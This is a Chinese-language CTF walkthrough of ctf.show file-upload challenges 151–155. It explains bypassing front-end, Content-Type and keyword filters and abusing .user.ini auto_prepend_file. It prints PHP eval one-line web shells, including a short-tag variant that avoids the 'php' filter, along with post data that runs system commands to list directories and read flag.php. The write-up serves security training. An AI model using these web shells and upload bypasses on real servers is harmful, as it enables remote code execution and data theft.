这段时间一直在搞文件上传相关的知识,正好把ctf的题目做做写写给自字做个总结!
不过有一个确定就是所有的测试全部是黑盒测试,无法从代码层面和大家解释,我找个时间把upload-labs靶场做一做给大家讲讲白盒的代码审计
一、实验准备
1.ctf网站:
www.ctf.show
2.工具:
burpsuite抓包工具、hackbar工具(如果大家没有可以私我)、firefox(火狐浏览器)
二、实验过程
(一)第151关 -- 前端验证
前提:我们已知此处可以上传图片类型文件
对于前端验证,我们常用的有两种方法进行绕过:
1.在右键检查->设置处启用禁止js
不过此方法建议使用虽然我们有时候能够绕过,但是当此网页含有大量使用js编写的代码时,会导致网页部分功能瘫痪!汗颜,ctf也失效了,所以还是老老实实使用第二种方法
2.将后门以.jpg/.png/.gif等允许格式发送,使用bp抓包修改后缀
上传成功!
但是此时可能会有小可爱问呐:哎哎哎,你咋知道就是前端验证呢?说出你的证据!
我们右键查看网页源码,查看到js源码过滤逻辑,只允许我们上传.png文件
3.利用后门文件
一句话木马,上下两种无论带不带引号均可以:
<?php @eval($_POST['ws'])?>
<?php @eval($_POST[ws])?>
此时我们存在两种方法(此处我们统一使用第2中方法):
(1)通过蚁剑连接寻找flag文件
payload:
https://cfc70c23-fd28-45cf-b79f-5c80ebe03e70.challenge.ctf.show/https://cfc70c23-fd28-45cf-b79f-5c80ebe03e70.challenge.ctf.show/https://cfc70c23-fd28-45cf-b79f-5c80ebe03e70.challenge.ctf.show/upload/1.php
连接密码(因人而异):
ws
(2)直接通过hackbar发post包利用system()函数执行
post data:ws=system("ls ../");
post data:ws=system("tac ../flag.php");
成功!
(二)第152关 -- 不严谨的后端验证
1.上传后门及分析
此处考察我们content-type验证为:image/png、image/gif、image/jpg
传输正确文件抓包,content-type为image/pnf
发送一句话木马,修改content-type值为:image/png,此处注意一下,我直接上传.php文件发现无法通过,定睛一看才发现前端验证还没关,汗颜!上传1.png的木马
上传成功!
2.利用后门
与151关类似,我们使用第二种方法,通过hackbar直接发包利用函数的方式获取flag
payload:
https://8ee848c0-130e-4d4c-a316-2c8f5e26d731.challenge.ctf.show/upload/1.phphttps://8ee848c0-130e-4d4c-a316-2c8f5e26d731.challenge.ctf.show/upload/1.php
https://8ee848c0-130e-4d4c-a316-2c8f5e26d731.challenge.ctf.show/upload/1.php
post data:ws=system('ls ../');
post data:ws=system("tac ../flag.php");
成功!
(三)第153关 -- 利用php中.user.ini文件进行解析
我们尝试使用151关和152关的思路进行解题,发现无法实现,继而想到后端是否过滤大小写,抓包后将1.png文件改成1.pHp,发现能够上传成功,但是无法利用
突然崩溃,但是!.user.ini文件出现了,正如apache服务中的.htaccess文件!
1. .user.ini文件特性
当网站进行扫描时,会将.user.ini文件指向路径内容包含在首页代码处(如index.php、index.html等),使用参数auto_prepend_file(包含至首页文件头部)和auto_append_file(包含在首页文件尾部)进行配置
例如:auto_prepend_file=1.png //将1.png文件内容包含在首页文件中,“=”后紧跟需要包含文件路径
所以,本题的解题思路:
先将.user.ini文件上传至upload目录处,并且在其中写入auto_prepend_file=1.png,紧接着上传1.png格式一句话代码,最后访问payload即可
2.上传.user.ini文件(使用bp中repaeater重发器功能进行上传)
内容:auto_prepend_file=1.png
上传成功
3.上传1.png格式一句话木马
上传成功!
4.利用
首先访问..upload/index.php触发.ujser.ini文件将1.png内容写入index.php中
paylaod:https://26af1829-9bfb-4bd6-ad55-ea24bb694ac1.challenge.ctf.show/upload/index.phphttps://26af1829-9bfb-4bd6-ad55-ea24bb694ac1.challenge.ctf.show/upload/index.php
其次,操作如上述两关
https://26af1829-9bfb-4bd6-ad55-ea24bb694ac1.challenge.ctf.show/upload/index.php(四)第154关 -- 内容过滤
执行思路如153关,但是在上传1.png文件时注意所过滤的内容
1.上传.user.ini文件
(具体不在进行演示与上述153关相同)
2.上传1.png木马文件寻找过滤内容
过滤内容:php
经过多次尝试发包,当文件内容不包含php字眼时可以上传成功,所以过滤内容为php
所以我们的问题变成如何在不写入php字眼时传入后门?提供方式如下:
paylaod:<?=eval($_POST['ws']);?>
上传成功
3.利用后门
是骡子是马我们拉出来遛一遛,进行前述关卡利用操作
首先访问首页文件触发.user.ini将1.png内容写入,触发后门
payload:https://8d5042ac-a58e-46a4-82cf-90dd07ccc04a.challenge.ctf.show/upload/index.php
post data:ws=system("ls ../");
post data:ws=system("tac ../flag.php");
成功!
(五)第155关 -- 内容过滤
整体思路与154关一样,只是过滤内容不一样,所以我们此关着重关注测试所过滤的内容!
1.上传.user.ini文件
内容:auto_prepend_file=1.png
2.测试过滤内容
发现仅仅去掉php即可成功发送(妈呀,那不是直接和154关一样啦!)
过滤内容:php
paylaod:<?=eval($_POST['ws']);?>
3.利用(与154一致)
访问../upload/index.php触发->寻找flag.php文件所在位置->查看flag.php文件内容
成功!
先写到这,明天继续!
